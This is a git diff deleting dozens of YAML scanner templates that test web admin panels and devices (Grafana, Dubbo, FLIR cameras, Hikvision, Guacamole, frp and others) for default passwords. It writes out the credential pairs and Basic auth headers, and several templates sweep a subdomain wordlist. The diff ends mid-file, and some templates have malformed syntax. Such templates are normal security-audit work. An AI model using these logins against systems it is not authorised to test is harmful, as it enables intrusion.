- - l0ne1y
- description: |-
- Apache DolphinScheduler 默认口令登录漏洞
- Apache DolphinScheduler是一个分布式去中心化,易扩展的可视化DAG工作流任务调度平台。其web管理后台默认账户为admin/dolphinscheduler123
- severity: high
- remediation: |-
- 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。
- 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。
- 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。
- 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)
- 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/)
-requests:
-- matchers:
- - type: word
- condition: and
- part: body
- words:
- - '"msg":"login success"'
- - '"sessionId":'
- - type: status
- status:
- - 200
- matchers-condition: and
- raw:
- - |
- POST /dolphinscheduler/login HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- userName={{user}}&userPassword={{pass}}
- attack: pitchfork
- payloads:
- pass:
- - dolphinscheduler123
- user:
- - admin
diff --git a/tmp/default/dubbo-admin-default-login.yaml b/tmp/default/dubbo-admin-default-login.yaml
deleted file mode 100755
index 93dedc9068..0000000000
--- a/tmp/default/dubbo-admin-default-login.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: dubbo-admin-default-login
-info:
- name: Dubbo Admin Default Login
- author:
- - l0ne1y
- description: |-
- Apache Dubbo 默认口令登录漏洞
- Apache Dubbo 是一款微服务框架,为大规模微服务实践提供高性能 RPC 通信、流量治理、可观测性等解决方案, 涵盖Java、Golang 等多种语言 SDK 实现。其web管理后台存在默认账户root/root,guest/guest
- severity: high
- remediation: |-
- 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。
- 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。
- 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。
- 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)
- 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/)
-requests:
-- matchers:
- - type: word
- condition: and
- words:
- - Dubbo Admin
- - /sysinfo/versions
- - '{{username}}'', ''/logout'')'
- - type: status
- status:
- - 200
- matchers-condition: and
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Authorization: Basic {{base64(username + ':' + password)}}
- attack: pitchfork
- payloads:
- password:
- - guest
- - root
- username:
- - guest
- - root
diff --git a/tmp/default/dubbo-admin-default-password.yaml b/tmp/default/dubbo-admin-default-password.yaml
deleted file mode 100644
index 731901624c..0000000000
--- a/tmp/default/dubbo-admin-default-password.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: dubbo-admin-default-password
-
-info:
- name: Dubbo Admin Default Password
- author: mumu0215(https://github.com/mumu0215)
- severity: high
- verified: true
- description: |
- fofa-query: app="APACHE-dubbo"
-
-set:
- root: "base64('root:root')"
- guest: "base64('guest:guest')"
-rules:
- r0:
- request:
- method: GET
- path: /
- headers:
- Authorization: Basic {{root}}
- expression: response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b"'/logout'") && response.body.bcontains(b"/sysinfo/versions")
- r1:
- request:
- method: GET
- path: /
- headers:
- Authorization: Basic {{guest}}
- expression: response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b"'/logout'") && response.body.bcontains(b"/sysinfo/versions")
-expression: r0() || r1()
diff --git a/tmp/default/dubbo-admin-default-password.yml b/tmp/default/dubbo-admin-default-password.yml
deleted file mode 100644
index 567ec2a1cf..0000000000
--- a/tmp/default/dubbo-admin-default-password.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-dubbo-admin-default-password
-manual: true
-transport: http
-rules:
- guest0:
- request:
- cache: true
- method: GET
- path: /
- headers:
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- expression: 'response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b": guest'', ''/logout''") && response.body.bcontains(b"/sysinfo/versions")'
- root0:
- request:
- cache: true
- method: GET
- path: /
- headers:
- Authorization: Basic cm9vdDpyb290
- expression: 'response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b": root'', ''/logout''") && response.body.bcontains(b"/sysinfo/versions")'
-expression: root0() || guest0()
-detail:
- author: mumu0215(https://github.com/mumu0215)
- links:
- - https://www.cnblogs.com/wishwzp/p/9438658.html
diff --git a/tmp/default/elasticsearch-insecure-default-config.yaml b/tmp/default/elasticsearch-insecure-default-config.yaml
deleted file mode 100644
index fbaa8be7fd..0000000000
--- a/tmp/default/elasticsearch-insecure-default-config.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-info:
- id: elasticsearch-insecure-default-config
- name: Elasticsearch Insecure Default Configuration - Detect
- author: OpenAI
- description: Template to detect Elasticsearch installations with insecure default configurations
- severity: High
- classification:
- country: any
- tags:
- - elasticsearch
- - security
- - configuration
- - high
-
- reference:
- - https://www.elastic.co/guide/en/elasticsearch/reference/7.x/security-settings.html
-
- matcher-condition: or
-
- requests:
- method: GET
- path:
- - "/_cat/plugins?v&s=component&h=name,component,version,description,elasticsearch_version"
- description: Attempt to retrieve plugin information
- condition: and
-
- matchers:
- - pattern: "discovery.type=single-node"
- type: body
- description: Single-node discovery mode found in Elasticsearch configuration
-
- response:
- - status:
- - 200
diff --git a/tmp/default/emcecom-default-login-7213.yaml b/tmp/default/emcecom-default-login-7213.yaml
deleted file mode 100644
index 93149d5d1c..0000000000
--- a/tmp/default/emcecom-default-login-7213.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: dell-emc-ecom-default-login
-info:
- name: Dell EMC ECOM Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:#1Password on Dell EMC ECOM application.
- reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
- tags: dell,emc,ecom,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: ECOMSecurity"
- part: header
- - type: word
- words:
- - "Welcome to ECOM"
- - type: status
- status:
- - 200
diff --git a/tmp/default/emcecom-default-login.yaml b/tmp/default/emcecom-default-login.yaml
deleted file mode 100644
index cdf3056535..0000000000
--- a/tmp/default/emcecom-default-login.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: dell-emc-ecom-default-login
-
-info:
- name: Dell EMC ECOM Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:#1Password on Dell EMC ECOM application.
- reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
- tags: dell,emc,ecom,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: ECOMSecurity"
- part: header
-
- - type: word
- words:
- - "Welcome to ECOM"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/exacqvision-default-login-7276.yaml b/tmp/default/exacqvision-default-login-7276.yaml
deleted file mode 100644
index 2dbd6d8f30..0000000000
--- a/tmp/default/exacqvision-default-login-7276.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: exacqvision-default-login
-info:
- name: ExacqVision Default Login
- author: ELSFA7110
- severity: high
- tags: exacqvision,default-login
- reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /service.web HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- action=login&u=admin&p=admin256
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - "application/json"
- - type: word
- part: body
- condition: and
- words:
- - '"auth":'
- - '"success": true'
diff --git a/tmp/default/exacqvision-default-login.yaml b/tmp/default/exacqvision-default-login.yaml
deleted file mode 100644
index 24443718a8..0000000000
--- a/tmp/default/exacqvision-default-login.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: exacqvision-default-login
-
-info:
- name: ExacqVision Default Login
- author: ELSFA7110
- severity: high
- tags: exacqvision,default-login
- reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /service.web HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- action=login&u=admin&p=admin256
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: header
- words:
- - "application/json"
-
- - type: word
- part: body
- condition: and
- words:
- - '"auth":'
- - '"success": true'
diff --git a/tmp/default/exacqvision-default-password.yaml b/tmp/default/exacqvision-default-password.yaml
deleted file mode 100644
index f8031d916a..0000000000
--- a/tmp/default/exacqvision-default-password.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: exacqvision-default-password
-
-info:
- name: ExacqVision Default Login
- author: ELSFA7110
- severity: high
- verified: true
- description: fafo "ExacqVision"
-
-set:
- username: "admin"
- password: "admin256"
-rules:
- r0:
- request:
- method: POST
- path: /service.web
- body: action=login&u={{username}}&p={{password}}
- expression: |
- response.status == 200 && response.body.bcontains(b'"auth":') && response.body.bcontains(b'"success": true') && response.headers["content-type"].contains("application/json")
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/flir-ax8-default-credentials-7512.yaml b/tmp/default/flir-ax8-default-credentials-7512.yaml
deleted file mode 100644
index a276b7d57e..0000000000
--- a/tmp/default/flir-ax8-default-credentials-7512.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: flir-default-credentials
-info:
- name: Flir Default Credentials
- author: pikpikcu
- severity: medium
- tags: default-login,flir
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login/dologin HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 35
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
- Connection: closen
-
- user_name=admin&user_password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"success"'
- - type: dsl
- dsl:
- - contains(tolower(all_headers), 'text/html')
- - contains(tolower(all_headers), 'phpsessid')
- - contains(tolower(all_headers), 'showcameraid')
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/flir-ax8-default-credentials.yaml b/tmp/default/flir-ax8-default-credentials.yaml
deleted file mode 100644
index 6a0e82a315..0000000000
--- a/tmp/default/flir-ax8-default-credentials.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: flir-default-credentials
-
-info:
- name: Flir Default Credentials
- author: pikpikcu
- severity: medium
- tags: default-login,flir
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/dologin HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 35
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
- Connection: closen
-
- user_name=admin&user_password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"success"'
- - type: dsl
- dsl:
- - contains(tolower(all_headers), 'text/html')
- - contains(tolower(all_headers), 'phpsessid')
- - contains(tolower(all_headers), 'showcameraid')
- condition: and
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/flir-default-login-7515.yaml b/tmp/default/flir-default-login-7515.yaml
deleted file mode 100644
index 0ac686891d..0000000000
--- a/tmp/default/flir-default-login-7515.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: flir-default-login
-info:
- name: Flir Default Login
- author: pikpikcu
- severity: medium
- tags: default-login,flir,camera,iot
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login/dologin HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: */*
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- user_name=admin&user_password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"success"'
- - type: dsl
- dsl:
- - contains(tolower(all_headers), 'text/html')
- - contains(tolower(all_headers), 'phpsessid')
- - contains(tolower(all_headers), 'showcameraid')
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/flir-default-login.yaml b/tmp/default/flir-default-login.yaml
deleted file mode 100644
index 109cbca629..0000000000
--- a/tmp/default/flir-default-login.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: flir-default-login
-
-info:
- name: Flir Default Login
- author: pikpikcu
- severity: medium
- tags: default-login,flir,camera,iot
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/dologin HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: */*
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- user_name=admin&user_password=admin
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - '"success"'
-
- - type: dsl
- dsl:
- - contains(tolower(all_headers), 'text/html')
- - contains(tolower(all_headers), 'phpsessid')
- - contains(tolower(all_headers), 'showcameraid')
-
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/frp-default-credentials-7555.yaml b/tmp/default/frp-default-credentials-7555.yaml
deleted file mode 100644
index dc34c8b21e..0000000000
--- a/tmp/default/frp-default-credentials-7555.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: frp-default-credentials
-
-info:
- name: Frp Default credentials
- author: pikpikcu
- severity: info
- tags: frp,default-login
- reference: https://github.com/fatedier/frp/issues/1840
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /api/proxy/tcp HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "proxies"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/frp-default-login-7558.yaml b/tmp/default/frp-default-login-7558.yaml
deleted file mode 100644
index 3f2a80ac6b..0000000000
--- a/tmp/default/frp-default-login-7558.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: frp-default-login
-info:
- name: Frp Default Login
- author: pikpikcu
- severity: high
- tags: frp,default-login
- reference: https://github.com/fatedier/frp/issues/1840
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /api/proxy/tcp HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: */*
- Authorization: "Basic YWRtaW46YWRtaW4="
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "proxies"
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/frp-default-login.yaml b/tmp/default/frp-default-login.yaml
deleted file mode 100644
index da4974aeb5..0000000000
--- a/tmp/default/frp-default-login.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: frp-default-login
-
-info:
- name: Frp Default Login
- author: pikpikcu
- severity: high
- tags: frp,default-login
- reference: https://github.com/fatedier/frp/issues/1840
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /api/proxy/tcp HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: */*
- Authorization: "Basic YWRtaW46YWRtaW4="
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "proxies"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/ftp-default-credentials.yaml b/tmp/default/ftp-default-credentials.yaml
deleted file mode 100644
index 162211b15a..0000000000
--- a/tmp/default/ftp-default-credentials.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: ftp-default-credentials
-
-info:
- name: FTP Service with anonymous Login
- author: pussycat0x
- severity: info
- tags: network,ftp,default-login,service
- metadata:
- mongoid: 0000
-
-network:
-
- - inputs:
- - data: "USER anonymous\r\nPASS anonymous\r\n"
- host:
- - "{{Hostname}}"
- - "{{Host}}:21"
-
- matchers:
- - type: word
- words:
- - "230"
- - "Anonymous user logged in"
- condition: and
diff --git a/tmp/default/gcloud-config-default_1.yaml b/tmp/default/gcloud-config-default_1.yaml
deleted file mode 100644
index 237483f514..0000000000
--- a/tmp/default/gcloud-config-default_1.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: gcloud-config-default
-
-info:
- name: Google Cloud Default Config - Detect
- author: DhiyaneshDK
- severity: info
- description: Google Cloud default configuration was detected.
- reference: https://cloud.google.com
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cwe-id: CWE-200
- metadata:
- max-request: 2
- verified: true
- shodan-query: html:"access_tokens.db"
- tags: google,cloud,devops,exposure
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/configurations/config_default"
- - "{{BaseURL}}/.config/gcloud/configurations/config_default"
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '[core]'
- - 'account'
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2023/02/05
diff --git a/tmp/default/gophish-default-login.yaml b/tmp/default/gophish-default-login.yaml
deleted file mode 100644
index 68219014cf..0000000000
--- a/tmp/default/gophish-default-login.yaml
+++ /dev/null
@@ -1,54 +0,0 @@
-id: gophish-default-login
-
-info:
- name: Gophish < v0.10.1 Default Credentials
- author: arcc,dhiyaneshDK
- severity: high
- description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary.
- reference:
- - https://docs.getgophish.com/user-guide/getting-started
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 2
- tags: gophish,default-login
-
-http:
- - raw:
- - |
- GET /login HTTP/1.1
- Host: {{Hostname}}
- - |
- POST /login HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}}
-
- attack: pitchfork
- payloads:
- user:
- - admin
- pass:
- - gophish
-
- extractors:
- - type: regex
- name: csrf_token
- part: body
- internal: true
- group: 1
- regex:
- - 'name="csrf_token" value="(.+?)"'
- matchers:
- - type: dsl
- dsl:
- - "!contains(tolower(header), 'location: /login')"
- - "contains(tolower(header), 'location: /')"
- - "contains(tolower(header), 'gophish')"
- - "status_code==302"
- condition: and
-
-# digest: 490a00463044022057f4c353e45ad57d1b2844f7167a1d2713729840a1c039489756a150766c4c4e0220540d4742ee2c7813856f435e37dbaf4daa720343d485cf604856ba364822ec6e:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/grafana-default-credential.yaml b/tmp/default/grafana-default-credential.yaml
deleted file mode 100644
index 5ea2310051..0000000000
--- a/tmp/default/grafana-default-credential.yaml
+++ /dev/null
@@ -1,60 +0,0 @@
-id: grafana-default-credential
-info:
- name: Grafana Default Credentials Check
- author: pdteam
- severity: high
-
-requests:
- # https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
- # https://github.com/grafana/grafana/issues/14755
- # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
- # So make sure, not to attempt more than 4 password for same valid user.
-
- - payloads:
-
- # grafana_username:
- # - admin
-
- grafana_password:
- - prom-operator
- - admin
-
- # Added default grafana and prometheus user.
- # Source:- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
-
- attack: sniper
-
- # Available types: sniper, pitchfork and clusterbomb
-
- raw:
- - |
- POST /login HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
- Accept: application/json, text/plain, */*
- Accept-Language: en-US,en;q=0.5
- Referer: {{BaseURL}}
- content-type: application/json
- Connection: close
-
- {"user":"admin","password":"§grafana_password§"}
-
- # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - grafana_session
- part: header
- # Check for 'grafana_session' cookie on valid login in the response header.
-
- - type: word
- words:
- - Logged in
- part: body
- # Check for valid string on valid login.
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/grafana-default-credentials.yml b/tmp/default/grafana-default-credentials.yml
deleted file mode 100644
index 9a2fa30cbc..0000000000
--- a/tmp/default/grafana-default-credentials.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-info:
- id: grafana-default-credentials
- name: Grafana Default Credentials - Detect
- author: OpenAI
- description: Template to detect Grafana default credentials
- severity: High
- classification:
- country: any
- tags:
- - grafana
- - credentials
- - security
-
- requests:
- - method: GET
- path:
- - "/login"
- - "/login/*"
-
- matchers:
- - pattern: "name=\"username\" value=\"admin\".*name=\"password\""
- type: body
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/default/grafana-default-password.yaml b/tmp/default/grafana-default-password.yaml
deleted file mode 100644
index 4463684fc7..0000000000
--- a/tmp/default/grafana-default-password.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: grafana-default-password
-
-info:
- name: Grafana Default Password
- author: For3stCo1d (https://github.com/For3stCo1d)
- severity: high
- verified: true
-
-rules:
- r0:
- request:
- method: POST
- path: /login
- headers:
- Content-Type: application/json
- body: '{"user":"admin","password":"admin"}'
- expression: response.status == 200 && response.body.bcontains(b'"message":') && response.body.bcontains(b'"Logged in"') && response.raw_header.bcontains(b'grafana_session')
- r1:
- request:
- method: POST
- path: /login
- headers:
- Content-Type: application/json
- body: '{"user":"admin","password":"prom-operator"}'
- expression: response.status == 200 && response.body.bcontains(b'"message":') && response.body.bcontains(b'"Logged in"') && response.raw_header.bcontains(b'grafana_session')
-expression: r0() || r1()
-
diff --git a/tmp/default/grafana-default-password.yml b/tmp/default/grafana-default-password.yml
deleted file mode 100644
index 45c3a37082..0000000000
--- a/tmp/default/grafana-default-password.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-grafana-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /login
- headers:
- Content-Type: application/json
- body: '{"user":"admin","password":"admin"}'
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"\"message\":\"Logged in\"")
-expression: r0()
-detail:
- author: For3stCo1d (https://github.com/For3stCo1d)
- description: "grafana-default-password"
- links:
- - https://www.jianshu.com/p/dd27f6a48cf8
diff --git a/tmp/default/guacamole-default-login-7860.yaml b/tmp/default/guacamole-default-login-7860.yaml
deleted file mode 100644
index 6613bfd7e5..0000000000
--- a/tmp/default/guacamole-default-login-7860.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: guacamole-default-credentials
-info:
- name: Guacamole Default Credentials
- author: r3dg33k
- severity: high
- tags: guacamole,default-login
- reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22.
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /api/tokens HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Origin: {{Scheme}}://{{Subdomains}}
- Referer: {{Scheme}}://{{Subdomains}}
-
- username=guacadmin&password=guacadmin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"username"'
- - '"authToken"'
- - '"guacadmin"'
- condition: and
- - type: word
- words:
- - 'application/json'
- part: header
- - type: status
- status:
- - 200
diff --git a/tmp/default/guacamole-default-login.yaml b/tmp/default/guacamole-default-login.yaml
deleted file mode 100644
index 940e6e05dd..0000000000
--- a/tmp/default/guacamole-default-login.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: guacamole-default-credentials
-
-info:
- name: Guacamole Default Credentials
- author: r3dg33k
- severity: high
- tags: guacamole,default-login
- reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22.
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /api/tokens HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Origin: {{Scheme}}://{{Subdomains}}
- Referer: {{Scheme}}://{{Subdomains}}
-
- username=guacadmin&password=guacadmin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"username"'
- - '"authToken"'
- - '"guacadmin"'
- condition: and
-
- - type: word
- words:
- - 'application/json'
- part: header
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/hikvision-intercom-service-default-password.yaml b/tmp/default/hikvision-intercom-service-default-password.yaml
deleted file mode 100644
index 9a17f26df4..0000000000
--- a/tmp/default/hikvision-intercom-service-default-password.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: hikvision-intercom-service-default-password
-
-info:
- name: Hikvision Intercom Service Default Password
- author: xueba(user/pass=admin/12345)
- severity: high
- verified: true
- description: app="HIKVISION-群组对讲服务配置平台" admin/12345
-
-rules:
- r0:
- request:
- method: POST
- path: /authorize.action
- body: |
- username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
- expression: response.status == 200 && "\"success\":(.*?)true,(.*?)\"msg\":(.*?)\"OK\"".bmatches(response.body)
-expression: r0()
-
diff --git a/tmp/default/hikvision-intercom-service-default-password.yml b/tmp/default/hikvision-intercom-service-default-password.yml
deleted file mode 100644
index 508bd5a75b..0000000000
--- a/tmp/default/hikvision-intercom-service-default-password.yml
+++ /dev/null
@@ -1,24 +0,0 @@
-name: poc-yaml-hikvision-intercom-service-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /
- expression: response.status == 200 && response.body.bcontains(bytes("document.title = LOGIN_BTN_LOGIN"))
- r1:
- request:
- cache: true
- method: POST
- path: /authorize.action
- body: |
- username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
- follow_redirects: false
- expression: 'response.status == 200 && response.body.bcontains(b"{\"success\": true, \"msg\": \"OK\"}")'
-expression: r0() && r1()
-detail:
- author: xueba(user/pass=admin/12345)
- links:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568
diff --git a/tmp/default/hp-switch-default-login-8037.yaml b/tmp/default/hp-switch-default-login-8037.yaml
deleted file mode 100644
index a671212b40..0000000000
--- a/tmp/default/hp-switch-default-login-8037.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: hp-switch-default-login
-info:
- name: HP 1820-8G Switch J9979A Default Credential
- author: pussycat0x
- severity: high
- reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
- metadata:
- fofa-dork: 'HP 1820-8G Switch J9979A'
- tags: default-login,hp
-requests:
- - payloads:
